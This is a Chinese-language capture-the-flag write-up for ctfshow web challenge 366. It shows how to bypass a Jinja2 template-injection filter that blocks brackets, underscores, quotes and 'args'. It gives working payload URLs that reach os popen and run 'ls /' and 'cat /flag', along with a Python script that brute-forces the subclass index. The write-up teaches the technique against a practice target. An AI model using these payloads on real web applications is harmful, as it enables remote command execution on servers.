SSTI模板注入-中括号、args、下划线、单双引号被过滤绕过（ctfshow web入门366）

SSTI模板注入-中括号、args、下划线、单双引号被过滤绕过（ctfshow web入门366）

绕过原理

单双引号被过滤，意味着我们不能通过单双引号来获取基类和子类，也不能以字符串的方式传递我们执行的命令，这样的话我们可以使用小括号来获取基类和子类，使用request.values.参数 和 reqest.args.参数 通过传参的方式来传递执行的命令，如果args被过滤就是用request.values.参数 的方式。中括号被过滤，意味着我们不能通过子类的索引值来获取我们想要的子类以及不能通过方法名来获取我们想要的方法，这时我们可以通过使用__getitem__()方法来获取，该方法即可传递数值也可传递字符串。

下划线被过滤，这就意味着我们不能使用__class__、__base__、__globals__等等带有下划线的方法，这时我们可以使用attr(request.values.参数)的方法来获取，例如：().__class__ 与 ()|attr(“__class__”)是一样的效果，由于下划线被过滤，我们通过传参的方式来解决，即：()|attr(request.values.a)&a=__class__。

实例引入-ctfshow web入门366

1、判断是否存在SSTI模板注入漏洞

输出参数?name={{7*7}} 看页面是否回显出49，如果回显49即存在SSTI模板注入漏洞。

页面回显49，证明该站点存在SSTI模板注入漏洞。

2、获得内置类所对应的类

由于单双引号与中括号、args还有下线被过滤，我们使用小括号来获取类，使用|attr()来获取类名，使用request.values.参数 来传参。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)}}&a=__class__

3、获得object基类

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)}}&a=__class__&b=__base__

4、获得所有子类

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()}}&a=__class__&b=__base__&c=__subclasses__

5、获得含有可以执行shell命令方法的类

我们还是以获取包含popen()方法的类，即：os._wrap_close。
但是由于我们事先不知道该类含有popen()方法，所以我们还是写一个python脚本跑一下，使用requests模块循环请求页面，每次请求改变子类的索引值，并判断返回的源码中是否含有"popen"，如果有直接中断循环，记录该索引值，该索引值所对应的类即是我们需要的类。

import requests

for num in range(500):
    url = "http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(" + str(num) + ")|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen"
    res = requests.get(url).text
    if "popen" in res:
        print(num)
        break

得到我们需要子类的索引值为132。

6、获得可以执行shell命令的方法

由于我们上步骤是以popen()方法为例的吗，那么我们获取的执行shell命令的方法也就是popen()方法。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen

7、执行shell命令获取flag

由于popen()返回的file对象，所以我们要得到shell执行的结果，我们还需要使用read()来读取才能获取shell执行的结果。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=ls /

发现根目录下存在flag，直接cat读取。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=cat /flag

成功拿到flag。